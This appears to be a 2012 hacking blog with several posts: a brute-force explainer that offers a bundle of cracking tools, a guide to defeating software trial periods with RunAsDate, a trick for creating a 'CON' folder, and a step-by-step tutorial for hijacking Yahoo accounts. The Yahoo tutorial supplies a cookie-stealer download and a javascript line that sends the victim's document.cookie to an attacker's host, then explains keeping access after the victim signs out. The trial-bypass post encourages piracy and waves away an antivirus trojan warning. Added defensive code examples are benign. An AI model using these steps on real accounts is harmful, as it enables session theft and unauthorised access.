
Friday, 16 March 2012

What is Brute Force - Password cracking ?

 
Hello. The topic of this article is "Brute Force". In this article I will explain the meaning of brute force and provide some of the top brute force software to download. Let's start....

 Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies. Just as a criminal might break into, or "crack" a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence. Brute force is considered to be an infallible, although time-consuming, approach.


Crackers are sometimes used in an organization to test network security, although their more common use is for malicious attacks. Some variations, such as L0phtcrack from L0pht Heavy Industries, start by making assumptions, based on knowledge of common or organization-centered practices and then apply brute force to crack the rest of the data. L0phtcrack uses brute force to crack Windows NT passwords from a workstation. PC Magazine reported that a system administrator who used the program from a Windows 95 terminal with no administrative privileges, was able to uncover 85 percent of office passwords within twenty minutes.

You must have seen in movies how a hacker cracks a password. He takes a small device out of his pocket and connects it to the locker or whatever he wants to crack. Lots of digits and letters are shuffled on the device’s screen, and in a matter of minutes (and sometimes in seconds) the thing is unlocked. Pretty impressive, but it doesn’t happen that way. Basically an online system (by online system I mean a system which requires you to log in to get access) can’t be hacked like that. Even a password stored in an offline file can’t be hacked so easily.

Let's keep it as simple as it can get. You want to access a file which is password protected. You create a program that tries every possible combination of letters and numbers and feeds each one to the file to see if it is the right one. This procedure is repeated until the right combination is accepted by the file. This is what we call an attack, and this very procedure of trying possible combinations is called a Brute Force Attack.

Executing such a program, which has to produce every possible combination, requires a lot of computing power. The time it takes to break a password depends on the length of the password and the processor speed: the faster the processor, the shorter the time it takes to crack the password. Think it would be easy if you have a dual core or quad core? Think again. On desktop PCs it can take days to crack a password.

Memory Space Trade Off: this is a situation in which the time taken for processing can be reduced at the cost of space, and vice versa. To make it very clear, let's look at the previous example again. We can process the different combinations beforehand and store them in a file. When you need to break a password, the combinations are retrieved from that file, and this lessens the load on the processor. The only time consumed in this case is the retrieval of data from that file. This file is what is known as a Rainbow Table. It can break passwords in a few minutes, or even in a few seconds, depending on how strong the password is. It can be obtained from the World Wide Web, but beware of its size: it runs into GBs.

Now even if a hacker has the best of hardware, he can’t hack that easily. Why? Ever entered a password wrong multiple times? The site requires you to enter the text shown in an image to confirm that you are a human and it is not an account, and even if that fails (yes, there are algorithms that can read the text behind the image), the user is forbidden to enter the password for a fixed amount of time. So, there is no way in hell that a hacker can hack an online system by brute force, or even with the help of rainbow tables. But it surely gets the job done for offline files.
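The CAPTCHA-then-lockout behaviour described above, sketched from the defender's side as an added example that is not part of the original post. The class name, thresholds and doubling lock time are assumptions chosen for illustration; `guesses_in_window` gives an upper bound on how many guesses a single client gets per day even if it solves every CAPTCHA.

```python
from dataclasses import dataclass

@dataclass
class AccountState:
    failures: int = 0
    locked_until: float = 0.0

class LoginThrottle:
    """CAPTCHA after a few bad passwords, then a lockout that doubles each time."""

    def __init__(self, captcha_after=3, lock_after=5, base_lock_s=60.0, max_lock_s=3600.0):
        self.captcha_after = captcha_after
        self.lock_after = lock_after
        self.base_lock_s = base_lock_s
        self.max_lock_s = max_lock_s
        self.accounts = {}  # account name -> AccountState

    def status(self, account, now):
        st = self.accounts.get(account, AccountState())
        if now < st.locked_until:
            return "locked"
        return "captcha" if st.failures >= self.captcha_after else "ok"

    def record_failure(self, account, now):
        st = self.accounts.setdefault(account, AccountState())
        st.failures += 1
        over = st.failures - self.lock_after
        if over >= 0:
            # 60 s, 120 s, 240 s ... capped at max_lock_s
            lock = min(self.base_lock_s * 2 ** min(over, 20), self.max_lock_s)
            st.locked_until = now + lock
        return self.status(account, now)

    def record_success(self, account):
        self.accounts.pop(account, None)

def guesses_in_window(throttle, account, window_s):
    """Upper bound on guesses one client gets in window_s seconds, assuming
    it solves every CAPTCHA and retries the instant each lock ends."""
    t, guesses = 0.0, 0
    while t < window_s:
        if throttle.status(account, t) == "locked":
            t = throttle.accounts[account].locked_until
            continue
        throttle.record_failure(account, t)
        guesses += 1
    return guesses
```

With these assumed settings a single account accepts a few dozen guesses per day, which is why exhaustive guessing only remains practical against offline files.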

If I write more here in a single post, it would be difficult for many of us to analyze the information. So, more is coming in later lets-hack articles. But I am providing some of the most used brute force software; you can download it and use it for testing purposes...

This pack includes the following fully working software:

1. Attack tool kit
2. CrackWhore 2.0
3. Apache scanner
4. Brutus
5. Brutus 2006
6. CGI scan
7. crackftp
8. E-mail cracker
9. hackers utillity
10. php brutforcer
11. php BB pass extracter
12. php cracker
13. shadow scan
14. web crack 4.0

and a few more

download links:

Hope all of you will like this brief info, and download. Comment please...

Thursday, 15 March 2012

Pranav Mistry: The thrilling potential of SixthSense technology

ABOUT
'SixthSense' is a wearable gestural interface that augments the physical world around us with digital information and lets us use natural hand gestures to interact with that information.

We've evolved over millions of years to sense the world around us. When we encounter something, someone or some place, we use our five natural senses to perceive information about it; that information helps us make decisions and choose the right actions to take. But arguably the most useful information that can help us make the right decision is not naturally perceivable with our five senses, namely the data, information and knowledge that mankind has accumulated about everything and which is increasingly all available online. Although the miniaturization of computing devices allows us to carry computers in our pockets, keeping us continually connected to the digital world, there is no link between our digital devices and our interactions with the physical world. Information is confined traditionally on paper or digitally on a screen. SixthSense bridges this gap, bringing intangible, digital information out into the tangible world, and allowing us to interact with this information via natural hand gestures. ‘SixthSense’ frees information from its confines by seamlessly integrating it with reality, and thus making the entire world your computer.

The SixthSense prototype is comprised of a pocket projector, a mirror and a camera. The hardware components are coupled in a pendant like mobile wearable device. Both the projector and the camera are connected to the mobile computing device in the user’s pocket. The projector projects visual information enabling surfaces, walls and physical objects around us to be used as interfaces; while the camera recognizes and tracks user's hand gestures and physical objects using computer-vision based techniques. The software program processes the video stream data captured by the camera and tracks the locations of the colored markers (visual tracking fiducials) at the tip of the user’s fingers using simple computer-vision techniques. The movements and arrangements of these fiducials are interpreted into gestures that act as interaction instructions for the projected application interfaces. The maximum number of tracked fingers is only constrained by the number of unique fiducials, thus SixthSense also supports multi-touch and multi-user interaction.

The SixthSense prototype implements several applications that demonstrate the usefulness, viability and flexibility of the system. The map application lets the user navigate a map displayed on a nearby surface using hand gestures, similar to gestures supported by Multi-Touch based systems, letting the user zoom in, zoom out or pan using intuitive hand movements. The drawing application lets the user draw on any surface by tracking the fingertip movements of the user’s index finger. SixthSense also recognizes user’s freehand gestures (postures). For example, the SixthSense system implements a gestural camera that takes photos of the scene the user is looking at by detecting the ‘framing’ gesture. The user can stop by any surface or wall and flick through the photos he/she has taken. SixthSense also lets the user draw icons or symbols in the air using the movement of the index finger and recognizes those symbols as interaction instructions. For example, drawing a magnifying glass symbol takes the user to the map application or drawing an ‘@’ symbol lets the user check his mail. The SixthSense system also augments physical objects the user is interacting with by projecting more information about these objects projected on them. For example, a newspaper can show live video news or dynamic information can be provided on a regular piece of paper. The gesture of drawing a circle on the user’s wrist projects an analog watch.

The current prototype system costs approximately $350 to build. Instructions on how to make your own prototype device can be found here (coming soon).

Wednesday, 14 March 2012

How to Hack Softwares to use them Forever ?

Hi, I am back today with a most useful article. Hope all of you will like it! Here I will show you "How to Hack Softwares to use them Forever ?". It really is a useful article, because in our daily life we need thousands of programs today, most of which are highly paid. So how do you use them freely for your whole life?

Most of us are familiar with software that runs only for a specified period of time in trial mode. Once the trial period has expired, the software stops functioning and demands a purchase. But there is a way to run the software and make it function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in trial mode forever, we have to understand how this software works. I’ll try to explain this in brief, because the purpose of ICA is first to clear your basics. When such software is installed for the first time, it makes an entry in the Windows Registry with details such as the installed date and time, the installed path, etc. After installation, every time you run the software, it compares the current system date and time with the installed date and time. With this it can work out whether the trial period has expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.



Download RunAsDate v1.10

RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in its trial mode forever.
1. Note down the date and time when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period has expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.
4. It is better and safer to inject the date of the last day of the trial period.

For example, if the trial period expires on Oct 1 2009, always inject the date as Sep 30 2009 in RunAsDate.
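A vendor-side view of the date comparison described above, as an added example that is not part of the original post and not taken from any real product: the naive check trusts whatever clock value it is given, while the hardened check also stores the latest clock value it has ever seen and refuses to run when time appears to go backwards. The record layout, function names and 30-day period are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class TrialRecord:
    installed: datetime   # written once at install (the registry entry above)
    last_seen: datetime   # highest clock value observed on any run (assumed extra field)

def naive_check(rec, now, days=30):
    """Trial logic as the article describes it: compare 'now' with the install date."""
    return now - rec.installed <= timedelta(days=days)

def hardened_check(rec, now, days=30, tolerance=timedelta(hours=1)):
    """Same comparison plus a high-water mark that catches a clock moved backwards."""
    if now + tolerance < rec.last_seen:
        return "clock-rollback"
    rec.last_seen = max(rec.last_seen, now)
    if now - rec.installed > timedelta(days=days):
        return "expired"
    return "ok"

def demo():
    # Constructed dates matching the article's example: trial ends Oct 1 2009.
    rec = TrialRecord(datetime(2009, 9, 1), datetime(2009, 9, 1))
    real_run = hardened_check(rec, datetime(2009, 10, 15))    # real clock, after expiry
    faked_run = hardened_check(rec, datetime(2009, 9, 30))    # injected date
    naive_faked = naive_check(rec, datetime(2009, 9, 30))     # naive check is fooled
    return real_run, faked_run, naive_faked

# The high-water mark only helps once the program has seen a later clock, so a
# complete check needs a time source outside the process, e.g. a license server.
```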

Warning: AVG Antivirus reports that RunAsDate is infected with "Trojan horse Generic 10.Thk". This will not harm your PC; the warning is just because this is a Windows registry hack tool!

Windows Mystery Exposed : Can you make a folder named ‘CON’ ?

Hello, I am back with a very funny and mysterious article. Hope all of you will enjoy learning all this... One day my Sir told me that he got a mail, and the message written in it was almost as below...
Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.
This is something pretty cool…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn’t answer why this happened!
TRY IT NOW !!


This is not the first time I have heard this funny question, "why can't we create a folder with the name 'CON'?", and I’m sure most ICA members also tried to make a folder named "CON" just now after reading the title of the article! If not, then go and try it first.... If you try creating a folder named CON, as the mail claims, it’ll get renamed automatically to New Folder. But there is no mystery behind this, and the team at Microsoft very well knows the reason for this. :-)


Why is it not possible to create a folder named CON ?
Before we proceed further, let me tell you a small secret: you can’t even create a folder named PRN, AUX, NUL and many others.

The reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below screen-shot taken from Microsoft’s website shows a list of reserved keywords in DOS.



If you try creating a folder with any of these names, the name automatically changes back to the default “New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up.

You can actually create a folder named CON !!
There is actually a way to create a folder named CON, or any other name from the above list of reserved keywords. This can be done through command prompt. But it is advisable not to do so, as it might result in your system becoming unstable.

Step 1: To create a folder named CON, go to command prompt and type “MD \\.\D:\CON” (without quotes). This will create a folder named CON in D:. See the screenshot.



Step 2: You cannot delete this folder by normal delete. To delete the folder, again go to command prompt and type “RD \\.\D:\CON” without quotes.

Step 3: I’ll again recommend you not to try this on your system, as it might become unstable. In case you can’t stop yourself, don’t do it on a drive on which Windows is installed (generally C:).
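Because these names resolve to devices rather than files, code that accepts user-supplied file names on Windows should reject them. The validator below is an added example, not part of the original post; its function names are made up for illustration, and the list uses the four names given above plus the COM1-COM9 and LPT1-LPT9 ports commonly documented with them.

```python
import re

# Classic DOS device names: CON, PRN, AUX, NUL plus the serial and
# parallel port names COM1-COM9 and LPT1-LPT9.
RESERVED = {"CON", "PRN", "AUX", "NUL"} \
    | {f"COM{i}" for i in range(1, 10)} \
    | {f"LPT{i}" for i in range(1, 10)}

def is_reserved_device_name(component: str) -> bool:
    """True if one path component resolves to a DOS device on Windows.

    Case does not matter, trailing dots and spaces are ignored, and an
    extension does not help: "con.txt" still names the console device.
    """
    base = component.rstrip(" .").split(".", 1)[0].rstrip(" ")
    return base.upper() in RESERVED

def has_device_namespace_prefix(path: str) -> bool:
    r"""True for the \\.\ and \\?\ prefixes, which skip normal name parsing
    (the MD and RD commands above rely on the first of these)."""
    return path.startswith(("\\\\.\\", "\\\\?\\"))

def reserved_components(path: str) -> list:
    """Return every component of a user-supplied path that is reserved."""
    return [p for p in re.split(r"[\\/]+", path) if is_reserved_device_name(p)]

def validate_upload_name(path: str) -> bool:
    """Accept a name only if it has no namespace prefix and no reserved part."""
    return not has_device_namespace_prefix(path) and not reserved_components(path)
```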

So people, on a machine everything is possible...

Hack Yahoo accounts with Session IDs or session cookies !

What are session IDs or session cookies ?
In simple language, whenever we sign into an account, a unique string is generated. One copy is saved on the server and the other in our browser as a cookie. Both are matched every time we do anything in our account. This string, or login session, is destroyed when we click on the 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop-up box showing you the cookies. Now log in to your account and do the same thing; you would see more elements added to the cookies. These represent session IDs.
Note: By stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in the form of cookies.

An attacker can steal that session by convincing the victim to run a piece of code in the browser. The attacker can use that stolen session to log in to the victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out', the session gets destroyed and the attacker also gets signed out.

But in the case of Yahoo, it's not the same. The attacker doesn't get signed out when the victim clicks 'Sign out', though the session automatically gets destroyed after 24 hrs by Yahoo. But when the user simply refreshes the window in the Yahoo account, he gets a session for the next 24 hrs. This means that once the Yahoo account session is stolen, the attacker can access the account for a lifetime by refreshing the window every 24 hrs. I am not actually sure whether it's 24 or 48 hrs.
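The server-side behaviour that closes both gaps described above (sign-out that leaves a copied session alive, and a refresh that extends it indefinitely), as an added example that is not part of the original post and is not Yahoo's code. The class name, the cookie name `sid` and the 7-day absolute cap are assumptions; the 24-hour idle window follows the figure given in the text.

```python
import secrets

IDLE_S = 24 * 3600          # sliding window renewed by activity (24 h, as in the text)
ABSOLUTE_S = 7 * 24 * 3600  # assumed hard cap that no refresh can extend

class SessionStore:
    def __init__(self):
        self._sessions = {}  # sid -> {"user", "created", "last_used"}

    def login(self, user, now):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "created": now, "last_used": now}
        return sid

    def validate(self, sid, now):
        """Return the user for a live session, or None if it is unknown or expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_used"] > IDLE_S or now - s["created"] > ABSOLUTE_S:
            del self._sessions[sid]
            return None
        s["last_used"] = now
        return s["user"]

    def logout(self, sid):
        """Delete the session on the server, so every copy of the cookie dies."""
        return self._sessions.pop(sid, None) is not None

def session_cookie(sid):
    # HttpOnly keeps the value out of document.cookie; Secure limits it to HTTPS.
    return f"Set-Cookie: sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

def successful_refreshes(store, sid, every_s):
    """Count how many times a session created at t=0 can be renewed by
    touching it every every_s seconds before the absolute cap ends it."""
    n, t = 0, every_s
    while store.validate(sid, t) is not None:
        n, t = n + 1, t + every_s
    return n
```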





Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.


3. Give this code to the victim to run in his browser when he is logged in to his Yahoo account. Yahoo.php is basically the cookie stealing script, and hacked.php executes the stolen cookies in the browser.
Stolen cookies get stored in the directory 'cookies'.
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again be redirected to his Yahoo account.

4. Open the hacked.php . The password is 'explore'.


You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Admin.



